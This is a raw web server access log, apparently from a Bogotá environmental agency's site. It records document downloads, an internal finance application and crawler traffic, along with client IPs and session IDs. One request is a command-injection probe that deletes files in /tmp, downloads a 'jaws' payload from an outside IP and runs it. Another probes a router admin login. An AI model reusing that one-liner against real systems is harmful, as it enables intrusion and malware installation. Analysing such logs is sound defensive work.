191.95.59.190 - - [08/Sep/2023:13:48:02 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 63208
191.95.59.190 - - [08/Sep/2023:13:48:02 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
191.95.59.190 - - [08/Sep/2023:13:48:02 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.59.190 - - [08/Sep/2023:13:48:02 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.59.190 - - [08/Sep/2023:13:48:02 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.59.190 - - [08/Sep/2023:13:48:02 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.59.190 - - [08/Sep/2023:13:48:03 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.59.190 - - [08/Sep/2023:13:48:03 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.59.190 - - [08/Sep/2023:13:48:03 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1560
191.95.59.190 - - [08/Sep/2023:13:48:07 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 4824
191.95.59.190 - - [08/Sep/2023:13:48:09 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 31413
191.95.59.190 - - [08/Sep/2023:13:48:10 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 184
191.95.59.190 - - [08/Sep/2023:13:48:10 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 184
191.95.59.190 - - [08/Sep/2023:13:48:10 -0500] "GET /sipse/faces/presentacion/financiero/solicitudAnulacion/solicitudAnulacion.xhtml HTTP/1.1" 200 43336
191.95.59.190 - - [08/Sep/2023:13:48:11 -0500] "GET /sipse/faces/presentacion/financiero/solicitudAnulacion/solicitudAnulacion.xhtml HTTP/1.1" 200 43336
191.95.59.190 - - [08/Sep/2023:13:48:11 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
191.95.59.190 - - [08/Sep/2023:13:48:11 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.59.190 - - [08/Sep/2023:13:48:11 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.59.190 - - [08/Sep/2023:13:48:11 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.59.190 - - [08/Sep/2023:13:48:11 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.59.190 - - [08/Sep/2023:13:48:11 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.59.190 - - [08/Sep/2023:13:48:11 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.59.190 - - [08/Sep/2023:13:48:11 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/solicitudAnulacion.xhtml HTTP/1.1" 200 21672
201.245.192.253 - - [08/Sep/2023:13:48:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65962943bc1d1484c974eac862b03ab49.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
52.167.144.239 - - [08/Sep/2023:13:48:27 -0500] "GET /BLA/resoluciones/AUTOS%202023/4245.pdf HTTP/1.1" 200 877179
69.63.184.120 - - [08/Sep/2023:13:48:33 -0500] "GET /distrito-entrego-certificado-de-reconocimiento-a-mas-de-600-mujeres-que-reverdecen-tras-seis-meses-de-formacion-teorica-y-practica.html HTTP/1.1" 200 1113
201.245.192.253 - - [08/Sep/2023:13:49:06 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6fe616ddb68764dacb333ec8eb017034b.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [08/Sep/2023:13:49:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1297.pdf HTTP/1.1" 200 253516
201.245.192.253 - - [08/Sep/2023:13:49:26 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 200 5359
201.245.192.253 - - [08/Sep/2023:13:49:31 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 200 5456
52.167.144.19 - - [08/Sep/2023:13:49:34 -0500] "GET /portaldeninos/wp-content/uploads/2020/11/Torca-Guaymaral-B-768x432.jpg HTTP/1.1" 200 84221
52.167.144.239 - - [08/Sep/2023:13:49:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/1566.pdf HTTP/1.1" 304 -
201.245.192.253 - - [08/Sep/2023:13:49:38 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 200 5508
216.244.66.195 - - [08/Sep/2023:13:49:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1990.pdf HTTP/1.1" 200 254249
201.245.192.253 - - [08/Sep/2023:13:50:18 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 200 120582
201.245.192.253 - - [08/Sep/2023:13:50:19 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [08/Sep/2023:13:50:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [08/Sep/2023:13:50:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [08/Sep/2023:13:50:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [08/Sep/2023:13:50:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [08/Sep/2023:13:50:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [08/Sep/2023:13:50:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [08/Sep/2023:13:50:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65962943bc1d1484c974eac862b03ab49.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [08/Sep/2023:13:50:22 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 62324
201.245.192.253 - - [08/Sep/2023:13:50:24 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [08/Sep/2023:13:50:24 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [08/Sep/2023:13:50:24 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [08/Sep/2023:13:50:24 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [08/Sep/2023:13:50:24 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [08/Sep/2023:13:50:24 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [08/Sep/2023:13:50:24 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [08/Sep/2023:13:50:24 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1560
216.245.221.92 - - [08/Sep/2023:13:50:27 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [08/Sep/2023:13:50:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2027.pdf HTTP/1.1" 200 298529
201.245.192.253 - - [08/Sep/2023:13:51:06 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6fe616ddb68764dacb333ec8eb017034b.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [08/Sep/2023:13:51:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2333.pdf HTTP/1.1" 200 283522
172.22.2.4 - - [08/Sep/2023:13:51:26 -0500] "GET /BLA/boletinlegal/Directivas/2018/Directiva%20No.%2027%20del%2028%20de%20diciembre%20de%202018.pdf HTTP/1.1" 304 -
201.245.192.253 - - [08/Sep/2023:13:51:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42865
216.244.66.195 - - [08/Sep/2023:13:52:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2762.pdf HTTP/1.1" 200 348762
201.245.192.253 - - [08/Sep/2023:13:52:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65962943bc1d1484c974eac862b03ab49.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [08/Sep/2023:13:50:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [08/Sep/2023:13:52:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3217.pdf HTTP/1.1" 200 404712
201.245.192.253 - - [08/Sep/2023:13:53:06 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6fe616ddb68764dacb333ec8eb017034b.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [08/Sep/2023:13:51:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60342
216.244.66.195 - - [08/Sep/2023:13:53:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3662.pdf HTTP/1.1" 200 374984
201.245.192.253 - - [08/Sep/2023:13:54:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65962943bc1d1484c974eac862b03ab49.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [08/Sep/2023:13:54:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0217.pdf HTTP/1.1" 200 401636
201.245.192.253 - - [08/Sep/2023:13:55:06 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6fe616ddb68764dacb333ec8eb017034b.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [08/Sep/2023:13:55:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/02495.pdf HTTP/1.1" 200 297752
186.154.202.195 - - [08/Sep/2023:13:55:19 -0500] "GET /inscribete-y-participa-en-el-foro-sobre-la-gestion-de-los-bifenilos-policlorados-en-transformadores-electricos.html HTTP/1.1" 200 931
216.245.221.92 - - [08/Sep/2023:13:55:27 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [08/Sep/2023:13:55:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1957.pdf HTTP/1.1" 200 380532
201.245.192.253 - - [08/Sep/2023:13:56:18 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2021%2F HTTP/1.1" 200 442541
201.245.192.253 - - [08/Sep/2023:13:56:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65962943bc1d1484c974eac862b03ab49.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [08/Sep/2023:13:56:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1865.pdf HTTP/1.1" 200 466582
201.245.192.253 - - [08/Sep/2023:13:56:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42865
216.244.66.195 - - [08/Sep/2023:13:56:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%201997/0189.pdf HTTP/1.1" 200 41988
201.245.192.253 - - [08/Sep/2023:13:57:06 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6fe616ddb68764dacb333ec8eb017034b.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [08/Sep/2023:13:57:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%201997/0801.pdf HTTP/1.1" 200 43209
201.245.166.34 - - [08/Sep/2023:13:57:21 -0500] "GET /distrito-firmo-resolucion-de-etiquetado-vehicular-ambiental-herramienta-para-clasificar-vehiculos-segun-sus-niveles-de-emisiones.html HTTP/1.1" 200 841
216.244.66.195 - - [08/Sep/2023:13:57:56 -0500] "GET /BLA/resoluciones/AUTOS%202015/1755.pdf HTTP/1.1" 200 302603
172.22.2.4 - - [08/Sep/2023:13:56:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [08/Sep/2023:13:58:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65962943bc1d1484c974eac862b03ab49.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
52.167.144.225 - - [08/Sep/2023:13:58:38 -0500] "GET /Publicaciones/2023EE206569.pdf HTTP/1.1" 200 591502
216.244.66.195 - - [08/Sep/2023:13:58:41 -0500] "GET /BLA/resoluciones/AUTOS%202018/0209.pdf HTTP/1.1" 200 326669
201.245.192.253 - - [08/Sep/2023:13:59:06 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6fe616ddb68764dacb333ec8eb017034b.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [08/Sep/2023:13:57:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57790
66.249.66.84 - - [08/Sep/2023:13:59:12 -0500] "GET /portaldeninos/glosario/ HTTP/1.1" 200 97198
216.244.66.195 - - [08/Sep/2023:13:59:25 -0500] "GET /BLA/resoluciones/AUTOS%202018/0494.pdf HTTP/1.1" 200 335267
179.43.191.194 - - [08/Sep/2023:13:59:19 -0500] "POST /boaform/admin/formLogin HTTP/1.1" 404 1186
216.244.66.195 - - [08/Sep/2023:14:00:14 -0500] "GET /BLA/resoluciones/AUTOS%202018/0648.pdf HTTP/1.1" 200 338580
201.245.192.253 - - [08/Sep/2023:14:00:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65962943bc1d1484c974eac862b03ab49.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [08/Sep/2023:14:00:27 -0500] "HEAD / HTTP/1.1" 200 -
186.84.90.74 - - [08/Sep/2023:14:00:45 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX195CLJ3zWECJBoU1ZYfcWVd8fWMj3d99fpzIJsgjYoOan8BJBYFhn1VMnaLa6HXAn11beDcBW/2Rbbp7RLY2S/99UG5axPVvcHHc+H4He8omwwz9D7hVXxS9ztSPfLvTYHz5TzO4HYuv/jBsa4lbmTTRfFD8HczyP3qwG9lpISimYXiBc2dCCtzmHyaWRZxTtKgdeF29UD7WZr2c3waZM+ql6P5sXwvft6XBlZJTi9mBhc64MaxJpJDvF2kv4N1WnWSe1MkdCTn8Q==&u=U2FsdGVkX18NK6RQ3y5Bwu7Aqz5E2JRtYh3Ayod9OcY=&y=U2FsdGVkX1+f2o95JBPTto73XRPzurjxsyy91gL9D+HKzdkRWbovDo7+1366kkVo HTTP/1.1" 200 26
186.84.90.74 - - [08/Sep/2023:14:00:46 -0500] "GET /kwssiamovil/sm/acme/a?s=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&u=U2FsdGVkX18NK6RQ3y5Bwu7Aqz5E2JRtYh3Ayod9OcY=&y=U2FsdGVkX1+f2o95JBPTto73XRPzurjxsyy91gL9D+HKzdkRWbovDo7+1366kkVo HTTP/1.1" 200 26
186.84.90.74 - - [08/Sep/2023:14:00:46 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18cos4oyOWcthatELLGSamlzYHECA71iOEV4UIuSD/n1Q0+uQ68O+wXrbzNbN2bl3H3PRPrBLbwdMDxpNUj7IOPOsPGWAysPVbbrdAeSvWm4tKP0N3XudWP8O/GCcjjCozqWlJHmt0ccBpO8G2Wp5FkHMGLl3nXuvs=&u=U2FsdGVkX18NK6RQ3y5Bwu7Aqz5E2JRtYh3Ayod9OcY=&y=U2FsdGVkX1+f2o95JBPTto73XRPzurjxsyy91gL9D+HKzdkRWbovDo7+1366kkVo HTTP/1.1" 200 26
186.84.90.74 - - [08/Sep/2023:14:00:46 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19d99FaljXfB0Ve/2JteHemy2bmT8SI5QkSWItV6dq89unFeatb6j26TjcJ6F65fLz2yp5upgr8FCiH7RnRngdi6vjhYMSesXyJauxkh6RDzW7K8DCXg6NWefwxWkad1cwUrcYm1aZJxzt+Lc2yhIARr930P6/k82M=&u=U2FsdGVkX18NK6RQ3y5Bwu7Aqz5E2JRtYh3Ayod9OcY=&y=U2FsdGVkX1+f2o95JBPTto73XRPzurjxsyy91gL9D+HKzdkRWbovDo7+1366kkVo HTTP/1.1" 200 26
186.84.90.74 - - [08/Sep/2023:14:00:46 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+eKayMWxCgP+cwaz+BjeYnwEQwzJYVHrHShnIPpn+Rn0Kw6s9ooEl1g4OWM+iAIx5iTm0OKuXNQhwm9wO4vDzffjraNdVnq+W6AXN7XIyi5N2PWGZDJ28AGoXf7nEI7BXLsESQzReLcw3STOrw3h64lSly3s3t5Ec=&u=U2FsdGVkX18NK6RQ3y5Bwu7Aqz5E2JRtYh3Ayod9OcY=&y=U2FsdGVkX1+f2o95JBPTto73XRPzurjxsyy91gL9D+HKzdkRWbovDo7+1366kkVo HTTP/1.1" 200 26
186.84.90.74 - - [08/Sep/2023:14:00:46 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/oWGXXarMc5Bl7oFeDT8ShPxAOxEt7hk29aN1JcDlwtEx0AkoDJ5G0nIBr4l9AcaGB9VqStle3h2BtZOC73qjnC/H+MaM3I3umAyh+LBcv54SsaLkAkolCPj/zI7hPJ2X8kv9OvDMmitjeRdkCFWKMUY+VYFJiSpbCVNtMDWoYfJOYZP4XYOxgIh+Hj7E5CmlKR8MMVijZIw==&u=U2FsdGVkX18NK6RQ3y5Bwu7Aqz5E2JRtYh3Ayod9OcY=&y=U2FsdGVkX1+f2o95JBPTto73XRPzurjxsyy91gL9D+HKzdkRWbovDo7+1366kkVo HTTP/1.1" 200 26
216.244.66.195 - - [08/Sep/2023:14:00:50 -0500] "GET /BLA/resoluciones/AUTOS%202018/0758.pdf HTTP/1.1" 200 330975
201.245.192.253 - - [08/Sep/2023:14:01:06 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6fe616ddb68764dacb333ec8eb017034b.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
52.167.144.225 - - [08/Sep/2023:14:01:07 -0500] "GET /galeria/galeria/fotos/Jaboque3P.jpg HTTP/1.1" 200 35360
216.244.66.195 - - [08/Sep/2023:14:01:24 -0500] "GET /BLA/resoluciones/AUTOS%202018/0958.pdf HTTP/1.1" 200 278461
201.245.192.253 - - [08/Sep/2023:14:01:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42865
216.244.66.195 - - [08/Sep/2023:14:02:06 -0500] "GET /BLA/resoluciones/AUTOS%202018/0959.pdf HTTP/1.1" 200 281494
201.245.192.253 - - [08/Sep/2023:14:02:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65962943bc1d1484c974eac862b03ab49.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
104.28.92.31 - - [08/Sep/2023:14:02:29 -0500] "GET /inscribete-y-participa-en-el-foro-sobre-la-gestion-de-los-bifenilos-policlorados-en-transformadores-electricos.html HTTP/1.1" 200 931
201.245.192.253 - - [08/Sep/2023:14:02:37 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2020%2F HTTP/1.1" 200 169062
201.245.192.253 - - [08/Sep/2023:14:02:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/1695.pdf HTTP/1.1" 200 673479
216.244.66.195 - - [08/Sep/2023:14:02:45 -0500] "GET /BLA/resoluciones/AUTOS%202018/2712.pdf HTTP/1.1" 200 416405
201.245.192.253 - - [08/Sep/2023:14:03:06 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6fe616ddb68764dacb333ec8eb017034b.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
181.143.217.62 - - [08/Sep/2023:14:03:10 -0500] "GET /inscribete-y-participa-en-el-foro-sobre-la-gestion-de-los-bifenilos-policlorados-en-transformadores-electricos.html HTTP/1.1" 200 931
216.244.66.195 - - [08/Sep/2023:14:03:28 -0500] "GET /BLA/resoluciones/AUTOS%202018/3028.pdf HTTP/1.1" 200 337725
172.22.2.4 - - [08/Sep/2023:14:02:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [08/Sep/2023:14:04:11 -0500] "GET /BLA/resoluciones/AUTOS%202018/3444.pdf HTTP/1.1" 200 277544
201.245.192.253 - - [08/Sep/2023:14:04:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65962943bc1d1484c974eac862b03ab49.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [08/Sep/2023:14:04:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202003/0628.pdf HTTP/1.1" 200 1352706
172.22.2.4 - - [08/Sep/2023:14:03:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56607
201.245.192.253 - - [08/Sep/2023:14:05:06 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6fe616ddb68764dacb333ec8eb017034b.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [08/Sep/2023:14:05:27 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [08/Sep/2023:14:05:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/1195.pdf HTTP/1.1" 200 232700
156.146.62.139 - - [08/Sep/2023:14:05:51 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.8.251.176/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
66.249.66.194 - - [08/Sep/2023:14:06:13 -0500] "GET /en-julio-programate-para-asistir-a-las-caminatas-ecologicas-y-conectarte-con-la-naturaleza.html HTTP/1.1" 304 -
216.244.66.195 - - [08/Sep/2023:14:06:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0529.pdf HTTP/1.1" 200 274229
201.245.192.253 - - [08/Sep/2023:14:06:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65962943bc1d1484c974eac862b03ab49.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [08/Sep/2023:14:06:28 -0500] "GET /sipse/faces/faces/index.xhtml HTTP/1.1" 200 677
201.245.192.253 - - [08/Sep/2023:14:06:28 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [08/Sep/2023:14:06:28 -0500] "GET /sipse/faces/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12181
